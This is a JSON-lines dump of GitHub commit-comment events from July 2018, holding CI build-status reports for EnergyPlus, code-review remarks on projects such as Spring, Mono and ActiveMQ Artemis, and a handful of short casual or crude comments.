{"id":"8042112361","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29898475,"position":null,"line":null,"path":null,"commit_id":"2c43d0b852bf1e81e092fb674ad6a6188ee0afb4","created_at":"2018-07-31T06:57:10Z","updated_at":"2018-07-31T06:57:10Z","author_association":"NONE","body":"158922394_Issue#4431 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2335 of 2335 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2c43d0b852bf1e81e092fb674ad6a6188ee0afb4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2c43d0b852bf1e81e092fb674ad6a6188ee0afb4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2c43d0b852bf1e81e092fb674ad6a6188ee0afb4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.22%25-green.png)</a>\n"}},"created_at":"2018-07-31T06:57:10Z"}
{"id":"8042116723","type":"CommitCommentEvent","actor":{"login":"Zadezter"},"repo":{"name":"QuiltedTuba2798/FormShop"},"payload":{"comment":{"id":29898490,"position":null,"line":null,"path":null,"commit_id":"9141fc2ab34a381fc55189cdf1a7c6bbde19ca43","created_at":"2018-07-31T06:58:11Z","updated_at":"2018-07-31T06:58:11Z","author_association":"NONE","body":"Hmm."}},"created_at":"2018-07-31T06:58:11Z"}
{"id":"8042117096","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29898493,"position":null,"line":null,"path":null,"commit_id":"0c9aefa726c7f2d94c869042697d3624f729d1a4","created_at":"2018-07-31T06:58:16Z","updated_at":"2018-07-31T06:58:16Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (mjwitte) - i386-Windows-7-VisualStudio-14: OK (2956 of 2956 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0c9aefa726c7f2d94c869042697d3624f729d1a4-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0c9aefa726c7f2d94c869042697d3624f729d1a4-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T06:58:16Z"}
{"id":"8042118296","type":"CommitCommentEvent","actor":{"login":"fnoks"},"repo":{"name":"h5p/h5p-php-library"},"payload":{"comment":{"id":29898499,"position":null,"line":null,"path":null,"commit_id":"ac12801bf5ec58c36c4ca60557d12ff5e8233019","created_at":"2018-07-31T06:58:34Z","updated_at":"2018-07-31T06:58:34Z","author_association":"MEMBER","body":"We should bump core version on master as well, right?"}},"created_at":"2018-07-31T06:58:34Z"}
{"id":"8042119271","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29898503,"position":null,"line":null,"path":null,"commit_id":"2c43d0b852bf1e81e092fb674ad6a6188ee0afb4","created_at":"2018-07-31T06:58:48Z","updated_at":"2018-07-31T06:58:48Z","author_association":"NONE","body":"158922394_Issue#4431 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2c43d0b852bf1e81e092fb674ad6a6188ee0afb4-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-31T06:58:48Z"}
{"id":"8042123963","type":"CommitCommentEvent","actor":{"login":"pool-erin"},"repo":{"name":"tanzeelak/watt-site"},"payload":{"comment":{"id":29898556,"position":null,"line":null,"path":null,"commit_id":"bf429210666acfaa33be36b5beeeff9187055006","created_at":"2018-07-31T06:59:57Z","updated_at":"2018-07-31T06:59:57Z","author_association":"COLLABORATOR","body":"ok"}},"created_at":"2018-07-31T06:59:57Z"}
{"id":"8042127678","type":"CommitCommentEvent","actor":{"login":"cheungpat"},"repo":{"name":"SkygearIO/features"},"payload":{"comment":{"id":29898632,"position":null,"line":null,"path":null,"commit_id":"6f2138bc45d858ae6d0a7bb5ff14594a36621791","created_at":"2018-07-31T07:00:46Z","updated_at":"2018-07-31T07:00:46Z","author_association":"MEMBER","body":"lol i think this should goes to the “New” section :)"}},"created_at":"2018-07-31T07:00:46Z"}
{"id":"8042131790","type":"CommitCommentEvent","actor":{"login":"Sucber"},"repo":{"name":"kevinmissjoyce/gmall0328"},"payload":{"comment":{"id":29898699,"position":null,"line":null,"path":null,"commit_id":"6ab6eab99a930ff3e7deee9566345c545d56f8df","created_at":"2018-07-31T07:01:42Z","updated_at":"2018-07-31T07:01:42Z","author_association":"NONE","body":"hello bitch"}},"created_at":"2018-07-31T07:01:42Z"}
{"id":"8042132587","type":"CommitCommentEvent","actor":{"login":"TheoLechemia"},"repo":{"name":"PnX-SI/GeoNature"},"payload":{"comment":{"id":29898711,"position":null,"line":null,"path":null,"commit_id":"f124d81e766b0bdd2700a2d514429e12c3dce5c9","created_at":"2018-07-31T07:01:53Z","updated_at":"2018-07-31T07:01:53Z","author_association":"NONE","body":"Oui, ça peut éviter de recalculer le CRUVED pour chaque obs dans la synthese, et du coup améliorer les perfs."}},"created_at":"2018-07-31T07:01:53Z"}
{"id":"8042134131","type":"CommitCommentEvent","actor":{"login":"BUAATJWX"},"repo":{"name":"BUAATJWX/face_pca"},"payload":{"comment":{"id":29898735,"position":null,"line":null,"path":null,"commit_id":"e63e93660f208566d2eb7abd91277e9efd90c039","created_at":"2018-07-31T07:02:14Z","updated_at":"2018-07-31T07:02:14Z","author_association":"OWNER","body":"好几届军军"}},"created_at":"2018-07-31T07:02:14Z"}
{"id":"8042135308","type":"CommitCommentEvent","actor":{"login":"xssChauhan"},"repo":{"name":"hi-manshu/Blockchain-in-Python"},"payload":{"comment":{"id":29898758,"position":44,"line":44,"path":"hadcoin.py","commit_id":"dee5ff46932bcc18936a6660b01eb67f83b195bf","created_at":"2018-07-31T07:02:32Z","updated_at":"2018-07-31T07:02:32Z","author_association":"NONE","body":"Line length should not exceed 79 characters in L44.\r\n\r\nBreak it down like:\r\n\r\n```\r\nhash_operation = hashlib.sha256(\r\n    str( new_proof **2 - previous_proof ** 2).encode()\r\n).hexdigest()\r\n```"}},"created_at":"2018-07-31T07:02:32Z"}
{"id":"8042135490","type":"CommitCommentEvent","actor":{"login":"yisibugua-chw"},"repo":{"name":"kevinmissjoyce/gmall0328"},"payload":{"comment":{"id":29898762,"position":null,"line":null,"path":null,"commit_id":"6ab6eab99a930ff3e7deee9566345c545d56f8df","created_at":"2018-07-31T07:02:34Z","updated_at":"2018-07-31T07:02:34Z","author_association":"NONE","body":"who is joyce????"}},"created_at":"2018-07-31T07:02:34Z"}
{"id":"8042137038","type":"CommitCommentEvent","actor":{"login":"ZeroEpoch1969"},"repo":{"name":"TFPatches/TotalFreedomMod"},"payload":{"comment":{"id":29898790,"position":null,"line":null,"path":null,"commit_id":"2716e2500be914723470e86e8bec383bd9224b25","created_at":"2018-07-31T07:02:57Z","updated_at":"2018-07-31T07:02:57Z","author_association":"MEMBER","body":"type casts* smh"}},"created_at":"2018-07-31T07:02:57Z"}
{"id":"8042138589","type":"CommitCommentEvent","actor":{"login":"xssChauhan"},"repo":{"name":"hi-manshu/Blockchain-in-Python"},"payload":{"comment":{"id":29898818,"position":29,"line":29,"path":"hadcoin.py","commit_id":"dee5ff46932bcc18936a6660b01eb67f83b195bf","created_at":"2018-07-31T07:03:21Z","updated_at":"2018-07-31T07:03:21Z","author_association":"NONE","body":"```\r\n'transactions': self.transaction,\r\n```\r\nThe comma is important."}},"created_at":"2018-07-31T07:03:21Z"}
{"id":"8042140750","type":"CommitCommentEvent","actor":{"login":"xssChauhan"},"repo":{"name":"hi-manshu/Blockchain-in-Python"},"payload":{"comment":{"id":29898860,"position":30,"line":30,"path":"hadcoin.py","commit_id":"dee5ff46932bcc18936a6660b01eb67f83b195bf","created_at":"2018-07-31T07:03:52Z","updated_at":"2018-07-31T07:03:52Z","author_association":"NONE","body":"This line should not exist. Always check with `git diff --check` for useless lines and trailing spaces"}},"created_at":"2018-07-31T07:03:52Z"}
{"id":"8042141589","type":"CommitCommentEvent","actor":{"login":"BUAATJWX"},"repo":{"name":"BUAATJWX/face_pca"},"payload":{"comment":{"id":29898872,"position":1,"line":1,"path":"README.md","commit_id":"8b591721891b1f76ef0a6d61fb071dde3140d80f","created_at":"2018-07-31T07:04:05Z","updated_at":"2018-07-31T07:04:05Z","author_association":"OWNER","body":"kkk"}},"created_at":"2018-07-31T07:04:05Z"}
{"id":"8042154591","type":"CommitCommentEvent","actor":{"login":"dellpia"},"repo":{"name":"dellpia/web1"},"payload":{"comment":{"id":29899098,"position":null,"line":null,"path":null,"commit_id":"58fd1ed2b313427df26033efac227940f0f611c7","created_at":"2018-07-31T07:07:12Z","updated_at":"2018-07-31T07:07:12Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-31T07:07:12Z"}
{"id":"8042155970","type":"CommitCommentEvent","actor":{"login":"rexso"},"repo":{"name":"gnudatalanguage/gdl"},"payload":{"comment":{"id":29899119,"position":null,"line":null,"path":null,"commit_id":"3a0d733849fe0cf63e27a070c0897538eb7dca81","created_at":"2018-07-31T07:07:31Z","updated_at":"2018-07-31T07:07:31Z","author_association":"CONTRIBUTOR","body":"Thanks. Added a PR #436 to solve this."}},"created_at":"2018-07-31T07:07:31Z"}
{"id":"8042157137","type":"CommitCommentEvent","actor":{"login":"wanlida"},"repo":{"name":"wanlida/2018_diantou_PhotovoltaicPowerStation"},"payload":{"comment":{"id":29899138,"position":null,"line":null,"path":null,"commit_id":"a51ff0d42182c6993d8a58438babc43d997a380c","created_at":"2018-07-31T07:07:49Z","updated_at":"2018-07-31T07:07:49Z","author_association":"OWNER","body":"https://github.com/wanlida/2018_diantou_PhotovoltaicPowerStation/commit/a51ff0d#diff-92c2060a24072386f4a64e94d182c6b2"}},"created_at":"2018-07-31T07:07:49Z"}
{"id":"8042157737","type":"CommitCommentEvent","actor":{"login":"wanlida"},"repo":{"name":"wanlida/2018_diantou_PhotovoltaicPowerStation"},"payload":{"comment":{"id":29899149,"position":null,"line":null,"path":null,"commit_id":"a51ff0d42182c6993d8a58438babc43d997a380c","created_at":"2018-07-31T07:07:58Z","updated_at":"2018-07-31T07:07:58Z","author_association":"OWNER","body":"https://github.com/wanlida/2018_diantou_PhotovoltaicPowerStation/commit/a51ff0d#diff-34059f94c9d9216610dec4a91ed2f248"}},"created_at":"2018-07-31T07:07:58Z"}
{"id":"8042165514","type":"CommitCommentEvent","actor":{"login":"yuyutong"},"repo":{"name":"mipengine/mip2"},"payload":{"comment":{"id":29899290,"position":null,"line":null,"path":null,"commit_id":"6efe752465a2da8fce02562888d1d3ff7b06b6f4","created_at":"2018-07-31T07:09:49Z","updated_at":"2018-07-31T07:09:49Z","author_association":"CONTRIBUTOR","body":"add pr template"}},"created_at":"2018-07-31T07:09:49Z"}
{"id":"8042165930","type":"CommitCommentEvent","actor":{"login":"Trivista"},"repo":{"name":"Trivista/MyAssessment"},"payload":{"comment":{"id":29899298,"position":null,"line":null,"path":null,"commit_id":"97bdd6aa5bae0d6a04a744f2ebe7c4cb4c192824","created_at":"2018-07-31T07:09:55Z","updated_at":"2018-07-31T07:09:55Z","author_association":"OWNER","body":"Final editing on file"}},"created_at":"2018-07-31T07:09:55Z"}
{"id":"8042168677","type":"CommitCommentEvent","actor":{"login":"tomaszsmolarek"},"repo":{"name":"JetBrains/swot"},"payload":{"comment":{"id":29899345,"position":null,"line":null,"path":null,"commit_id":"ebd4a6babe0b3c29b96efc25351eabd42a671b58","created_at":"2018-07-31T07:10:34Z","updated_at":"2018-07-31T07:10:34Z","author_association":"NONE","body":"The university changed its Polish name and domain. English name is the same.\r\nA proper university which issues diplomas: http://www.am.gdynia.pl/en/Studies\r\nHas studies for Computer Science (Polish only): http://www.we.am.gdynia.pl/specjalnosc/4238 and http://www.we.am.gdynia.pl/specjalnosc/4237\r\nAlready in repo, just renaming"}},"created_at":"2018-07-31T07:10:34Z"}
{"id":"8042168937","type":"CommitCommentEvent","actor":{"login":"mitixx"},"repo":{"name":"brandonpittman/geekbar"},"payload":{"comment":{"id":29899347,"position":null,"line":null,"path":null,"commit_id":"60da0412f154e382a9e275fa3b9e92ea7acd1142","created_at":"2018-07-31T07:10:37Z","updated_at":"2018-07-31T07:10:37Z","author_association":"NONE","body":"Thank you yesterday! Brandon Pittman! :D\r\nI'm Tomomi.\r\nYour presentation is great!!👍\r\n I heard \"TailwindCSS\" first time.\r\nI read the source code and think \"TailwindCSS\" looks convenient because it can use from npm.\r\nDo you use LINE for contact tool usually?\r\nIf you don't use LINE what contact tools do you use?\r\nYou are very interesting! I want to talk with you more."}},"created_at":"2018-07-31T07:10:37Z"}
{"id":"8042175679","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29899371,"position":15,"line":15,"path":"019/1902.html","commit_id":"f5e1be67505177707df4f97eefb9d873c89d8311","created_at":"2018-07-31T07:12:16Z","updated_at":"2018-07-31T07:12:16Z","author_association":"COLLABORATOR","body":"@c-osanai \r\nこのeachはなんでしょう。"}},"created_at":"2018-07-31T07:12:16Z"}
{"id":"8042176428","type":"CommitCommentEvent","actor":{"login":"nechry"},"repo":{"name":"OpenZWave/open-zwave"},"payload":{"comment":{"id":29899376,"position":5,"line":12,"path":"cpp/build/support.mk","commit_id":"6a835cec1445d493a36e6d65d4a23200daa708bb","created_at":"2018-07-31T07:12:28Z","updated_at":"2018-07-31T07:12:28Z","author_association":"MEMBER","body":"the comment line still in phase?"}},"created_at":"2018-07-31T07:12:28Z"}
{"id":"8042190091","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29899424,"position":null,"line":null,"path":null,"commit_id":"877b9244b0c19b10921cb2807a7629051388071c","created_at":"2018-07-31T07:15:37Z","updated_at":"2018-07-31T07:15:37Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 568](https://ci.hashicorp.engineering/viewLog.html?buildId=107915&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-31T07:15:37Z"}
{"id":"8042194374","type":"CommitCommentEvent","actor":{"login":"Lastly"},"repo":{"name":"Lastly/ost-graphql-server"},"payload":{"comment":{"id":29899437,"position":18,"line":130,"path":"logic/type-defs.js","commit_id":"de8170aa812e5a0350f2cd379db985e1f7972b9e","created_at":"2018-07-31T07:16:37Z","updated_at":"2018-07-31T07:16:37Z","author_association":"OWNER","body":"Open question on what should be here (if anything).  This will return null as-is"}},"created_at":"2018-07-31T07:16:37Z"}
{"id":"8042195430","type":"CommitCommentEvent","actor":{"login":"AmauriC"},"repo":{"name":"AmauriC/tarteaucitron.js"},"payload":{"comment":{"id":29899441,"position":41,"line":1302,"path":"tarteaucitron.js","commit_id":"1ea7bfa82ab2fca3ca1faacd66b96f39b4e638d4","created_at":"2018-07-31T07:16:52Z","updated_at":"2018-07-31T07:16:52Z","author_association":"OWNER","body":"Une dernière erreur à corriger ^^\r\n### tarteaucitron.AddOrUpdate"}},"created_at":"2018-07-31T07:16:52Z"}
{"id":"8042195516","type":"CommitCommentEvent","actor":{"login":"mingming0608"},"repo":{"name":"mingming0608/once-again"},"payload":{"comment":{"id":29899442,"position":null,"line":null,"path":null,"commit_id":"7d9df033d259d42106a021d38d3a1251d1aceaf5","created_at":"2018-07-31T07:16:53Z","updated_at":"2018-07-31T07:16:53Z","author_association":"OWNER","body":"abcd"}},"created_at":"2018-07-31T07:16:53Z"}
{"id":"8042199665","type":"CommitCommentEvent","actor":{"login":"hyungtae3713"},"repo":{"name":"Shin-Hyunggyu/team-community"},"payload":{"comment":{"id":29899459,"position":1,"line":1,"path":"src/components/index.js","commit_id":"267a2e40157786fa314d64816c4f79d8e188ff27","created_at":"2018-07-31T07:17:50Z","updated_at":"2018-07-31T07:17:50Z","author_association":"COLLABORATOR","body":"어래 이렇게 하면 <Board.Board> 가 될 수도 있을텐데..."}},"created_at":"2018-07-31T07:17:50Z"}
{"id":"8042231362","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29899553,"position":null,"line":null,"path":null,"commit_id":"86bbaa851c15732a82e5c1260a75cabf20f029be","created_at":"2018-07-31T07:25:15Z","updated_at":"2018-07-31T07:25:15Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-78](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-78).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-78-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-31T07:25:15Z"}
{"id":"8042233085","type":"CommitCommentEvent","actor":{"login":"waling17"},"repo":{"name":"perfest/test007"},"payload":{"comment":{"id":29899565,"position":null,"line":null,"path":null,"commit_id":"8d6a4189ebe314c2f14468658977206355031905","created_at":"2018-07-31T07:25:38Z","updated_at":"2018-07-31T07:25:38Z","author_association":"NONE","body":"only 'hello world' ?"}},"created_at":"2018-07-31T07:25:38Z"}
{"id":"8042242771","type":"CommitCommentEvent","actor":{"login":"LtPetrov"},"repo":{"name":"xrOxygen/xray-oxygen"},"payload":{"comment":{"id":29899625,"position":4,"line":146,"path":"code/engine.vc2008/xrGame/UIZoneMap.cpp","commit_id":"d24e7cc8544a2390464652016e38aaab68eb3b55","created_at":"2018-07-31T07:27:47Z","updated_at":"2018-07-31T07:27:47Z","author_association":"MEMBER","body":"Как минимум - не лучше было бы впихнуть это после проверки на видимость и актора?"}},"created_at":"2018-07-31T07:27:47Z"}
{"id":"8042243676","type":"CommitCommentEvent","actor":{"login":"jhoeller"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":29899626,"position":13,"line":53,"path":"spring-webflux/src/main/java/org/springframework/web/reactive/socket/adapter/NettyWebSocketSessionSupport.java","commit_id":"4a147d26fcd086ffc4d495e34b6d1b54854c345b","created_at":"2018-07-31T07:27:56Z","updated_at":"2018-07-31T07:27:56Z","author_association":"CONTRIBUTOR","body":"We tend to consider such Maps as a sort of cache rather than an actual constant, so we use regular field casing in other such places as well. In the end it is a visual issue: Code that calls methods (like put) on an upper-case constant looks odd to me. A matter of taste, of course, but we're quite consistent about it."}},"created_at":"2018-07-31T07:27:56Z"}
{"id":"8042243999","type":"CommitCommentEvent","actor":{"login":"lovit"},"repo":{"name":"lovit/customized_konlpy"},"payload":{"comment":{"id":29899627,"position":null,"line":null,"path":null,"commit_id":"a5ddf6ce75c7a0ba5275cf36e95436bb9985a233","created_at":"2018-07-31T07:28:03Z","updated_at":"2018-07-31T07:28:03Z","author_association":"OWNER","body":"Fix #2 "}},"created_at":"2018-07-31T07:28:03Z"}
{"id":"8042244710","type":"CommitCommentEvent","actor":{"login":"mahammad13"},"repo":{"name":"mahammad13/Madiha-Muskaan"},"payload":{"comment":{"id":29899631,"position":null,"line":null,"path":null,"commit_id":"c653292a70dc00a6579b28b5e2745600b1565ff6","created_at":"2018-07-31T07:28:12Z","updated_at":"2018-07-31T07:28:12Z","author_association":"OWNER","body":"hi good morning"}},"created_at":"2018-07-31T07:28:12Z"}
{"id":"8042247762","type":"CommitCommentEvent","actor":{"login":"michaelandrepearce"},"repo":{"name":"apache/activemq-artemis"},"payload":{"comment":{"id":29899636,"position":87,"line":948,"path":"artemis-core-client/src/main/java/org/apache/activemq/artemis/core/protocol/core/impl/ActiveMQSessionContext.java","commit_id":"a2da41ee2e347bcf8fe721bded89e4a78ca14cfb","created_at":"2018-07-31T07:28:52Z","updated_at":"2018-07-31T07:28:52Z","author_association":"CONTRIBUTOR","body":"ah ok, sorry missed you moved that logic upwards."}},"created_at":"2018-07-31T07:28:52Z"}
{"id":"8042247819","type":"CommitCommentEvent","actor":{"login":"luobite"},"repo":{"name":"luobite/stack"},"payload":{"comment":{"id":29899637,"position":null,"line":null,"path":null,"commit_id":"55af84a879a3ebbc0660c5a5e08683dc1cdaa9cd","created_at":"2018-07-31T07:28:53Z","updated_at":"2018-07-31T07:28:53Z","author_association":"OWNER","body":"12306"}},"created_at":"2018-07-31T07:28:53Z"}
{"id":"8042248163","type":"CommitCommentEvent","actor":{"login":"jayagovinde"},"repo":{"name":"jayagovinde/projectfihome"},"payload":{"comment":{"id":29899642,"position":null,"line":null,"path":null,"commit_id":"7004654f74af2185501f63470e2e4ac67585b98b","created_at":"2018-07-31T07:28:57Z","updated_at":"2018-07-31T07:28:57Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-31T07:28:57Z"}
{"id":"8042253339","type":"CommitCommentEvent","actor":{"login":"jaykrell"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":29899653,"position":null,"line":null,"path":null,"commit_id":"c28849f256fe08f83c1275fe0a5b3c1ded9e13d0","created_at":"2018-07-31T07:30:07Z","updated_at":"2018-07-31T07:30:07Z","author_association":"MEMBER","body":"1. Is it worth zeroing inst_left or the entire inst in MONO_INST_NEW?\r\n2. Can these fields be initialized to what this is looking for and should be checked, just not always?"}},"created_at":"2018-07-31T07:30:07Z"}
{"id":"8042255353","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29899659,"position":null,"line":null,"path":null,"commit_id":"5423618217002d7a4b63ee843d08df79354bcd31","created_at":"2018-07-31T07:30:33Z","updated_at":"2018-07-31T07:30:33Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2351 of 2351 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5423618217002d7a4b63ee843d08df79354bcd31-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5423618217002d7a4b63ee843d08df79354bcd31-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T07:30:33Z"}
{"id":"8042255926","type":"CommitCommentEvent","actor":{"login":"tobiasrohloff"},"repo":{"name":"schul-cloud/schulcloud-mobile-android"},"payload":{"comment":{"id":29899664,"position":7,"line":11,"path":"README.md","commit_id":"eb756003040039d31259a99cac867f03d9621990","created_at":"2018-07-31T07:30:41Z","updated_at":"2018-07-31T07:30:41Z","author_association":"MEMBER","body":"The link seems to be wrong."}},"created_at":"2018-07-31T07:30:41Z"}
{"id":"8042259865","type":"CommitCommentEvent","actor":{"login":"Sucber"},"repo":{"name":"kevinmissjoyce/gmall0328"},"payload":{"comment":{"id":29899670,"position":null,"line":null,"path":null,"commit_id":"6ab6eab99a930ff3e7deee9566345c545d56f8df","created_at":"2018-07-31T07:31:32Z","updated_at":"2018-07-31T07:31:32Z","author_association":"NONE","body":"@yisibugua-chw a beautiful girl"}},"created_at":"2018-07-31T07:31:32Z"}
{"id":"8042262237","type":"CommitCommentEvent","actor":{"login":"michaelandrepearce"},"repo":{"name":"apache/activemq-artemis"},"payload":{"comment":{"id":29899679,"position":19,"line":574,"path":"artemis-jms-client/src/main/java/org/apache/activemq/artemis/jms/client/ActiveMQMessageProducer.java","commit_id":"a2da41ee2e347bcf8fe721bded89e4a78ca14cfb","created_at":"2018-07-31T07:32:05Z","updated_at":"2018-07-31T07:32:05Z","author_association":"CONTRIBUTOR","body":"The new response handler only gets invoked for correlating ids, Also the dedupe is the reason for the cache, e.g. it should only via the cache which \"should\" take care of this, by the nature that the id is removed from cache, so next will have cache miss and do nothing. \r\n\r\nWas there a case it was being invoked twice? If so that should be fixed as would be a bug in the cache code , or somewhere its being called not via the cache"}},"created_at":"2018-07-31T07:32:05Z"}
{"id":"8042269834","type":"CommitCommentEvent","actor":{"login":"jaumeortola"},"repo":{"name":"apertium/apertium-cat"},"payload":{"comment":{"id":29899699,"position":5,"line":70706,"path":"apertium-cat.cat.dix","commit_id":"67617735b043b9250243b9883cea75f310c8ec80","created_at":"2018-07-31T07:33:43Z","updated_at":"2018-07-31T07:33:43Z","author_association":"COLLABORATOR","body":"Alguns diccionaris tenen m i f, i altres no. Com que també hi ha l'adjectiu, tant se val. Podem deixar-ho així, només m."}},"created_at":"2018-07-31T07:33:43Z"}
{"id":"8042270874","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29899703,"position":null,"line":null,"path":null,"commit_id":"0c9aefa726c7f2d94c869042697d3624f729d1a4","created_at":"2018-07-31T07:33:56Z","updated_at":"2018-07-31T07:33:56Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (mjwitte) - Win64-Windows-7-VisualStudio-14: OK (2953 of 2956 tests passed, 0 test warnings)\n\nMessages:\n\n * 3 tests had: EIO diffs.\n * 3 tests had: Table big diffs.\n * 2 tests had: ESO big diffs.\n * 1 test had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 621\n * Failed: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0c9aefa726c7f2d94c869042697d3624f729d1a4-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0c9aefa726c7f2d94c869042697d3624f729d1a4-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-31T07:33:56Z"}
{"id":"8042273778","type":"CommitCommentEvent","actor":{"login":"GandalfSaxe"},"repo":{"name":"vscode-icons/vscode-icons"},"payload":{"comment":{"id":29899709,"position":null,"line":null,"path":null,"commit_id":"2f843d8c04f3e5e10e9f3b2fac861651a6d5068d","created_at":"2018-07-31T07:34:35Z","updated_at":"2018-07-31T07:34:35Z","author_association":"NONE","body":"Looks good. Any idea when this will be released? I keep getting error messages from `vscode-icons` that I'm pretty sure is caused by me running the portable version:\r\n\r\n`\r\n/Applications/Visual Studio Code - Insiders.app/Contents/Resources/app/out/vs/workbench/workbench.main.js:272 [Extension Host] Activating extension `robertohuertasm.vscode-icons` failed:  ENOENT: no such file or directory, open '/Users/gandalf/Library/Application Support/Code - Insiders/User/vsicons.settings.json' (at /Applications/Visual Studio Code - Insiders.app/Contents/Resources/app/out/vs/workbench/node/extensionHostProcess.js:459:583)\r\nt.log @ /Applications/Visual Studio Code - Insiders.app/Contents/Resources/app/out/vs/workbench/workbench.main.js:272\r\n`"}},"created_at":"2018-07-31T07:34:35Z"}
{"id":"8042274651","type":"CommitCommentEvent","actor":{"login":"jaykrell"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":29899713,"position":null,"line":null,"path":null,"commit_id":"7d7df5735975c5224035e75758d124eca6cd1904","created_at":"2018-07-31T07:34:47Z","updated_at":"2018-07-31T07:34:47Z","author_association":"MEMBER","body":"I think the commit message is an exaggeration, but ok.\r\n\r\nIt is more like C++17 no longer allows it but maybe just a quashable error with earlier.\r\n\r\nI think register is actually somewhat underappreciated.\r\n\r\nWhile the compilers of course these days make their own decisions and ignore the register keyword for register allocation, it does actually have a useful extra meaning -- you cannot take the address of a register variable, which really does help enregister, because it stops you from writing the  code that inhibits the optimizer from enregistering."}},"created_at":"2018-07-31T07:34:47Z"}
{"id":"8042278220","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29899718,"position":null,"line":null,"path":null,"commit_id":"5423618217002d7a4b63ee843d08df79354bcd31","created_at":"2018-07-31T07:35:31Z","updated_at":"2018-07-31T07:35:31Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5423618217002d7a4b63ee843d08df79354bcd31-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-31T07:35:31Z"}
